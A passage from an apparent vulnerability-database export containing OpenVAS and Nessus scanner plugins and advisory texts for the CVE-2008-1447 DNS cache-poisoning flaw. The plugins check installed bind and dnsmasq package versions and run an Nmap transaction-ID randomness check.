cache-poisoning attacks easier. In order to provide more resilience,\n BIND has been updated to use a range of random UDP source ports.\n (CVE-2008-1447)\n \n Note: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\n and 5 to allow BIND to use random UDP source ports.\n \n Users of BIND are advised to upgrade to these updated packages, which\n contain a backported patch to add this functionality.\n \n Red Hat would like to thank Dan Kaminsky for reporting this issue.\";\n\ntag_affected = \"bind on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-July/015083.html\");\n script_id(880195);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"CESA\", value: \"2008:0533\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"CentOS Update for bind CESA-2008:0533 centos3 i386\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Oracle Linux Local Security Checks ELSA-2008-0789", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122563", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122563", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0789", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0789.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122563\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:02 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0789\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0789 - dnsmasq security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0789\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0789.html\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.45~1.el5_2.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-09-04T14:21:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "This script attempts to check a DNS server for the predictable-TXID\n DNS recursion vulnerability.\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) dns-random-txid.nse.", "modified": "2017-08-25T00:00:00", "published": "2011-01-06T00:00:00", "id": "OPENVAS:801689", "href": "http://plugins.openvas.org/nasl.php?oid=801689", "type": "openvas", "title": "Nmap NSE: DNS Random TXID", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_dns_random_txid.nasl 7006 2017-08-25 11:51:20Z teissa $\n#\n# Wrapper for Nmap DNS Random TXID NSE script.\n#\n# Authors:\n# NSE-Script: Brandon Enright <bmenrigh@ucsd.edu>\n# NASL-Wrapper: Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# NASL-Wrapper: Copyright (c) 2010 Greenbone Networks GmbH (http://www.greenbone.net)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"This script attempts to check a DNS server for the predictable-TXID\n DNS recursion vulnerability.\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) dns-random-txid.nse.\";\n\n\nif(description)\n{\n script_id(801689);\n script_version(\"$Revision: 7006 $\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-25 13:51:20 +0200 (Fri, 25 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-06 14:34:14 +0100 (Thu, 06 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE: DNS Random TXID\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n\n script_mandatory_keys(\"Tools/Present/nmap\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse\");\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\n## Required Keys\nif((! get_kb_item(\"Tools/Present/nmap5.21\") &&\n ! get_kb_item(\"Tools/Present/nmap5.51\")) ||\n ! get_kb_item(\"Tools/Launch/nmap_nse\")) {\n exit(0);\n}\n\n## DNS Port\nport = 53;\nif(! get_udp_port_state(port)){\n exit(0);\n}\n\n## Run nmap and Get the result\nres = pread(cmd: \"nmap\", argv: make_list(\"nmap\", \"-sU\", \"--script=dns-random-txid.nse\",\n \"-p\", port, get_host_ip()));\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"dns-random-txid\" >< result) {\n msg = string('Result found by Nmap Security Scanner (dns-random-txid.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n');\n log_message(data : msg, port:port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2017-10-29T13:41:33", "edition": 2, "description": "Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS spoofing and cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting.", "published": "2008-07-10T00:00:00", "type": "nessus", "title": "Debian DSA-1605-1 : glibc - DNS cache poisoning", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "cpe": ["cpe:/o:debian:debian_linux"], "modified": "2012-12-28T00:00:00", "id": "DEBIAN_DSA-1605.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33452", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated advisory does not \n# have any package tests.\n#\n# Disabled on 2012/01/20.\n#\n\n# This script was automatically generated from Debian Security \n# Advisory DSA-1605. It is released under the Nessus Script \n# Licence.\n#\n# Debian Security Advisory DSA-1605 is (C) Software in the Public\n# Interest, Inc; see http://www.debian.org/license for details.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33452);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2012/12/28 21:13:28 $\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_osvdb_id(47232, 47916, 47926, 47927, 48245);\n script_xref(name:\"DSA\", value:\"1605\");\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Debian DSA-1605-1 : glibc - DNS cache poisoning\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS spoofing and cache poisoning attacks. Among\nother things, successful attacks can lead to misdirected web traffic\nand email rerouting.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"At this time, it is not possible to implement the recommended\ncountermeasures in the GNU libc stub resolver. The following\nworkarounds are available :\n\n 1. Install a local BIND 9 resolver on the host, possibly\n in forward-only mode. BIND 9 will then use source port\n randomization when sending queries over the network.\n (Other caching resolvers can be used instead.)\n\n 2. Rely on IP address spoofing protection if available. \n Successful attacks must spoof the address of one of the\n resolvers, which may not be possible if the network is \n guarded properly against IP spoofing attacks (both from \n internal and external sources).\n\nThis DSA will be updated when patches for hardening the stub resolver\nare available.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2008-2012 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\n# Deprecated.\nexit(0, \"The associated advisory does not have any package tests.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-01-17T12:44:10", "description": "From Red Hat Security Advisory 2008:0533 :\n\nUpdated bind packages that help mitigate DNS spoofing attacks are now\navailable.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\n[Updated 10th July 2008] We have updated the Enterprise Linux 5\npackages in this advisory. The default and sample caching-nameserver\nconfiguration files have been updated so that they do not specify a\nfixed query-source port. Administrators wishing to take advantage of\nrandomized UDP source ports should check their configuration file to\nensure they have not specified fixed query-source ports.\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the\nDNS (Domain Name System) protocols.\n\nThe DNS protocol protects against spoofing attacks by requiring an\nattacker to predict both the DNS transaction ID and UDP source port of\na request. In recent years, a number of papers have found problems\nwith DNS implementations which make it easier for an attacker to\nperform DNS cache-poisoning attacks.\n\nPrevious versions of BIND did not use randomized UDP source ports. If\nan attacker was able to predict the random DNS transaction ID, this\ncould make DNS cache-poisoning attacks easier. In order to provide\nmore resilience, BIND has been updated to use a range of random UDP\nsource ports. (CVE-2008-1447)\n\nNote: This errata also updates SELinux policy on Red Hat Enterprise\nLinux 4 and 5 to allow BIND to use random UDP source ports.\n\nUsers of BIND are advised to upgrade to these updated packages, which\ncontain a backported patch to add this functionality.\n\nRed Hat would like to thank Dan Kaminsky for reporting this issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 / 5 : bind (ELSA-2008-0533)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bind-chroot", "p-cpe:/a:oracle:linux:bind-sdb", "p-cpe:/a:oracle:linux:bind", "p-cpe:/a:oracle:linux:selinux-policy-targeted", "p-cpe:/a:oracle:linux:bind-devel", "p-cpe:/a:oracle:linux:bind-utils", "p-cpe:/a:oracle:linux:caching-nameserver", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:selinux-policy", "p-cpe:/a:oracle:linux:bind-libs", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:bind-libbind-devel", "p-cpe:/a:oracle:linux:selinux-policy-targeted-sources", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:selinux-policy-devel", "p-cpe:/a:oracle:linux:selinux-policy-strict", "p-cpe:/a:oracle:linux:selinux-policy-mls"], "id": "ORACLELINUX_ELSA-2008-0533.NASL", "href": "https://www.tenable.com/plugins/nessus/67709", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0533 and \n# Oracle Linux Security Advisory ELSA-2008-0533 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67709);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"RHSA\", value:\"2008:0533\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Oracle Linux 3 / 4 / 5 : bind (ELSA-2008-0533)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0533 :\n\nUpdated bind packages that help mitigate DNS spoofing attacks are now\navailable.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\n[Updated 10th July 2008] We have updated the Enterprise Linux 5\npackages in this advisory. The default and sample caching-nameserver\nconfiguration files have been updated so that they do not specify a\nfixed query-source port. Administrators wishing to take advantage of\nrandomized UDP source ports should check their configuration file to\nensure they have not specified fixed query-source ports.\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the\nDNS (Domain Name System) protocols.\n\nThe DNS protocol protects against spoofing attacks by requiring an\nattacker to predict both the DNS transaction ID and UDP source port of\na request. In recent years, a number of papers have found problems\nwith DNS implementations which make it easier for an attacker to\nperform DNS cache-poisoning attacks.\n\nPrevious versions of BIND did not use randomized UDP source ports. If\nan attacker was able to predict the random DNS transaction ID, this\ncould make DNS cache-poisoning attacks easier. In order to provide\nmore resilience, BIND has been updated to use a range of random UDP\nsource ports. (CVE-2008-1447)\n\nNote: This errata also updates SELinux policy on Red Hat Enterprise\nLinux 4 and 5 to allow BIND to use random UDP source ports.\n\nUsers of BIND are advised to upgrade to these updated packages, which\ncontain a backported patch to add this functionality.\n\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-July/000667.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-July/000668.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-July/000669.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-mls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-strict\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-targeted\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:selinux-policy-targeted-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-chroot-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-chroot-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-devel-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-devel-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-libs-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-libs-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"bind-utils-9.2.4-22.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"bind-utils-9.2.4-22.el3\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"bind-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"bind-chroot-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"bind-devel-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"bind-libs-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"bind-utils-9.2.4-28.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"selinux-policy-targeted-1.17.30-2.150.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"selinux-policy-targeted-sources-1.17.30-2.150.el4\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"bind-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-chroot-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-devel-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-libbind-devel-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-libs-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-sdb-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind-utils-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"caching-nameserver-9.3.4-6.0.1.P1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-2.4.6-137.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-devel-2.4.6-137.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-mls-2.4.6-137.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-strict-2.4.6-137.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-targeted-2.4.6-137.1.el5_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libbind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T12:44:13", "description": "From Red Hat Security Advisory 2008:0789 :\n\nAn updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : dnsmasq (ELSA-2008-0789)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dnsmasq", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2008-0789.NASL", "href": "https://www.tenable.com/plugins/nessus/67735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0789 and \n# Oracle Linux Security Advisory ELSA-2008-0789 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67735);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"RHSA\", value:\"2008:0789\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Oracle Linux 5 : dnsmasq (ELSA-2008-0789)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0789 :\n\nAn updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 